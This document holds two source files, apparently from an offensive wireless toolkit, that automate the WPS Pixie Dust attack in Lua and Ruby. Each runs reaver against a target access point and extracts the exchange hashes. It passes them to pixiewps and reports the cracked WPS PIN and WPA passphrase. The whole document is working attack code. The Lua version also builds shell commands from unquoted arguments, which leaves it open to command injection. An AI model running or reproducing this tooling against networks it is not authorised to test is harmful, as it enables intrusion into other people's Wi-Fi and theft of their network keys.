File: hackit/wireless/plugins/lua/scripts/wps_pixie.lua
local bssid = arg[1]
local iface = arg[2]
local output_dir = arg[3] or "/tmp/pixie_" .. bssid:gsub(":", "")

local function json_escape(s)
  return '"' .. tostring(s):gsub('\\', '\\\\'):gsub('"', '\\"'):gsub('\n', '\\n'):gsub('\r', '\\r') .. '"'
end

local function telemetry(event, data)
  local ts = tostring(os.time())
  io.write('{"event":' .. json_escape(event) .. ',"iface":' .. json_escape(iface) .. ',"bssid":' .. json_escape(bssid) .. ',"ssid":"","channel":"","data":' .. data .. ',"timestamp":' .. json_escape(ts) .. '}\n')
  io.flush()
end

local function check_monitor_mode()
  local f = io.popen("iw dev " .. iface .. " info 2>/dev/null")
  if not f then return false end
  local out = f:read("*a")
  f:close()
  return out:find("type monitor") ~= nil
end

local function ensure_output_dir()
  os.execute("mkdir -p " .. output_dir)
  telemetry("output_dir", '{"dir":' .. json_escape(output_dir) .. '}')
end

local function run_reaver_pixie()
  local cmd = "reaver -i " .. iface .. " -b " .. bssid .. " -c 1 -vvv -K 1 -L -N -f 2>/dev/null"
  telemetry("pixie_start", '{"cmd":' .. json_escape(cmd) .. '}')
  local f = io.popen(cmd, "r")
  if not f then
    telemetry("pixie_fail", '{"error":"Failed to start reaver"}')
    return nil
  end
  local output = {}
  local pke, pkr, ehash1, ehash2
  for line in f:lines() do
    table.insert(output, line)
    if line:find("PKE") then pke = line:match("[%x]+") or line:match("%[([%x]+)%]") end
    if line:find("PKR") then pkr = line:match("[%x]+") or line:match("%[([%x]+)%]") end
    if line:find("E%-Hash1") or line:find("E-Hash1") then ehash1 = line:match("[%x]+") or line:match("%[([%x]+)%]") end
    if line:find("E%-Hash2") or line:find("E-Hash2") then ehash2 = line:match("[%x]+") or line:match("%[([%x]+)%]") end
    if line:find("WPA PSK") or line:find("WPA key") then
      local key = line:match('"([^"]+)"')
      if key then
        telemetry("pixie_key", '{"wpa_key":' .. json_escape(key) .. '}')
      end
    end
    if line:find("%d+%.%d+%%") then
      local p = line:match("(%d+%.%d+)%%")
      if p then telemetry("pixie_progress", '{"progress":' .. tostring(p) .. '}') end
    end
  end
  f:close()
  local full = table.concat(output, "\n")
  if not pke then pke = full:match("PKE[=:]-([%x]+)") end
  if not pkr then pkr = full:match("PKR[=:]-([%x]+)") end
  if not ehash1 then ehash1 = full:match("E%-Hash1[=:]-([%x]+)") or full:match("E-Hash1[=:]-([%x]+)") end
  if not ehash2 then ehash2 = full:match("E%-Hash2[=:]-([%x]+)") or full:match("E-Hash2[=:]-([%x]+)") end
  return {pke = pke, pkr = pkr, ehash1 = ehash1, ehash2 = ehash2, output = full}
end

local function save_params(params)
  if not params then return end
  local f = io.open(output_dir .. "/params.txt", "w")
  if f then
    f:write("PKE=" .. (params.pke or "") .. "\n")
    f:write("PKR=" .. (params.pkr or "") .. "\n")
    f:write("E-Hash1=" .. (params.ehash1 or "") .. "\n")
    f:write("E-Hash2=" .. (params.ehash2 or "") .. "\n")
    f:close()
    telemetry("params_saved", '{"file":' .. json_escape(output_dir .. "/params.txt") .. '}')
  end
end

local function run_pixiewps(params)
  if not params or not params.pke then
    telemetry("pixiewps_skip", '{"message":"No PKE parameter extracted"}')
    return nil
  end
  local cmd = "pixiewps --pke " .. (params.pke or "") .. " --pkr " .. (params.pkr or "")
  if params.ehash1 then cmd = cmd .. " --e-hash1 " .. params.ehash1 end
  if params.ehash2 then cmd = cmd .. " --e-hash2 " .. params.ehash2 end
  cmd = cmd .. " 2>/dev/null"
  telemetry("pixiewps_start", '{"cmd":' .. json_escape(cmd) .. '}')
  local f = io.popen(cmd, "r")
  if not f then
    telemetry("pixiewps_fail", '{"error":"Failed to run pixiewps"}')
    return nil
  end
  local out = f:read("*a")
  f:close()
  local pin = out:match("WPS PIN[=:]-([%d]+)")
  local psk = out:match("WPA PSK[=:]-([%x]+)")
  telemetry("pixiewps_result", '{"pin":' .. json_escape(pin or "") .. ',"psk":' .. json_escape(psk or "") .. ',"output":' .. json_escape(out:sub(1, 500)) .. '}')
  return {pin = pin, psk = psk}
end

if not bssid or not iface then
  telemetry("error", '{"error":"Usage: wps_pixie.lua <bssid> <interface> [output_dir]"}')
  os.exit(1)
end

if not check_monitor_mode() then
  telemetry("error", '{"error":"Monitor mode required on ' .. iface .. '"}')
  os.exit(1)
end

local ok, err = pcall(function()
  ensure_output_dir()
  local params = run_reaver_pixie()
  if params then
    save_params(params)
    run_pixiewps(params)
  end
end)

if not ok then
  telemetry("error", '{"error":' .. json_escape(tostring(err)) .. '}')
  os.exit(1)
end

telemetry("complete", '{"output_dir":' .. json_escape(output_dir) .. '}')

File: hackit/wireless/plugins/ruby/scripts/wps_pixie.rb
#!/usr/bin/env ruby
# frozen_string_literal: true

require 'json'
require 'time'
require 'open3'

def emit(event, iface, bssid, ssid, channel, data)
  puts JSON.generate(event: event, iface: iface, bssid: bssid, ssid: ssid, channel: channel, data: data, timestamp: Time.now.iso8601)
  $stdout.flush
end

def parse_reaver_output(line, bssid, iface)
  data = { line: line.strip }

  case line
  when /\[\+\]\s*PKE\s*:\s*([a-fA-F0-9]+)/
    emit('pixie_pke', iface, bssid, '', 0, data.merge(pke: $1))
  when /\[\+\]\s*PKR\s*:\s*([a-fA-F0-9]+)/
    emit('pixie_pkr', iface, bssid, '', 0, data.merge(pkr: $1))
  when /\[\+\]\s*E-Hash1\s*:\s*([a-fA-F0-9]+)/
    emit('pixie_ehash1', iface, bssid, '', 0, data.merge(ehash1: $1))
  when /\[\+\]\s*E-Hash2\s*:\s*([a-fA-F0-9]+)/
    emit('pixie_ehash2', iface, bssid, '', 0, data.merge(ehash2: $1))
  when /\[\+\]\s*AuthKey\s*:\s*([a-fA-F0-9]+)/
    emit('pixie_authkey', iface, bssid, '', 0, data.merge(authkey: $1))
  when /\[\+\]\s*ENonce\s*:\s*([a-fA-F0-9]+)/
    emit('pixie_enonce', iface, bssid, '', 0, data.merge(enonce: $1))
  when /WPS\s+lockout/i
    emit('wps_lockout', iface, bssid, '', 0, data)
  when /\[\+\]\s*Found\s*Pin\s*:\s*(\d{4,8})/
    emit('pixie_pin_found', iface, bssid, '', 0, data.merge(pin: $1))
  when /\[\+\]\s*WPA\s*PSK\s*:\s*(.+)/
    emit('pixie_psk_found', iface, bssid, '', 0, data.merge(psk: $1.strip))
  end
end

def run_pixiewps(bssid, iface)
  reaver = `which reaver 2>/dev/null`.strip
  pixiewps = `which pixiewps 2>/dev/null`.strip

  emit('pixie_info', iface, bssid, '', 0, { reaver: !reaver.empty?, pixiewps: !pixiewps.empty? })

  raise 'reaver not found in PATH' if reaver.empty?

  pke_val = nil
  pkr_val = nil
  ehash1_val = nil
  ehash2_val = nil
  authkey_val = nil
  enonce_val = nil

  emit('pixie_reaver_start', iface, bssid, '', 0, { command: "#{reaver} -i #{iface} -b #{bssid} -K 1 -vv" })

  Open3.popen3(reaver, '-i', iface, '-b', bssid, '-K', '1', '-vv') do |stdin, stdout, stderr, reaver_thread|
    stdin.close
    readers = [stdout, stderr]

    until readers.empty?
      ready = IO.select(readers, nil, nil, 0.5)
      if ready
        ready[0].each do |r|
          begin
            line = r.gets
            if line
              line.force_encoding('UTF-8')
              parse_reaver_output(line, bssid, iface)

              pke_val = $1 if line =~ /\[\+\]\s*PKE\s*:\s*([a-fA-F0-9]+)/
              pkr_val = $1 if line =~ /\[\+\]\s*PKR\s*:\s*([a-fA-F0-9]+)/
              ehash1_val = $1 if line =~ /\[\+\]\s*E-Hash1\s*:\s*([a-fA-F0-9]+)/
              ehash2_val = $1 if line =~ /\[\+\]\s*E-Hash2\s*:\s*([a-fA-F0-9]+)/
              authkey_val = $1 if line =~ /\[\+\]\s*AuthKey\s*:\s*([a-fA-F0-9]+)/
              enonce_val = $1 if line =~ /\[\+\]\s*ENonce\s*:\s*([a-fA-F0-9]+)/
            else
              readers.delete(r)
            end
          rescue Errno::EINTR
            next
          end
        end
      end
    end

    reaver_thread.join
  end

  if pixiewps.empty?
    emit('pixiewps_not_found', iface, bssid, '', 0, {})
    return
  end

  return unless pke_val && pkr_val && ehash1_val && ehash2_val

  emit('pixiewps_start', iface, bssid, '', 0, { command: "#{pixiewps} --pke #{pke_val} --pkr #{pkr_val} --e-hash1 #{ehash1_val} --e-hash2 #{ehash2_val}" })

  pixie_args = [pixiewps, '--pke', pke_val, '--pkr', pkr_val,
                '--e-hash1', ehash1_val, '--e-hash2', ehash2_val]
  pixie_args += ['--authkey', authkey_val] if authkey_val
  pixie_args += ['--e-nonce', enonce_val] if enonce_val

  Open3.popen3(*pixie_args) do |stdin, stdout, stderr, pixie_thread|
    stdin.close
    [stdout, stderr].each do |r|
      Thread.new do
        r.each_line do |line|
          line.force_encoding('UTF-8')
          emit('pixiewps_output', iface, bssid, '', 0, { line: line.strip })
          if line =~ /\[\+\]\s*Pin\s*:\s*(\d{4,8})/
            emit('pixie_pin_computed', iface, bssid, '', 0, { pin: $1, tool: 'pixiewps' })
          end
          if line =~ /\[\+\]\s*WPA\s*PSK\s*:\s*(.+)/
            emit('pixie_psk_computed', iface, bssid, '', 0, { psk: $1.strip, tool: 'pixiewps' })
          end
        end
      end
    end
    pixie_thread.join
  end
end

begin
  bssid = ARGV[0]
  iface = ARGV[1]
  output_dir = ARGV[2] || '.'

  raise 'usage: wps_pixie.rb <bssid> <interface> [output_dir]' unless bssid && iface

  Dir.mkdir(output_dir) unless Dir.exist?(output_dir)

  emit('pixie_start', iface, bssid, '', 0, { output_dir: output_dir })
  run_pixiewps(bssid, iface)
  emit('pixie_complete', iface, bssid, '', 0, {})

rescue Interrupt
  emit('pixie_interrupted', iface || '', bssid || '', '', 0, {})
rescue => e
  $stderr.puts JSON.generate(event: 'error', data: { message: e.message, backtrace: e.backtrace&.first }, timestamp: Time.now.iso8601)
  exit 1
end
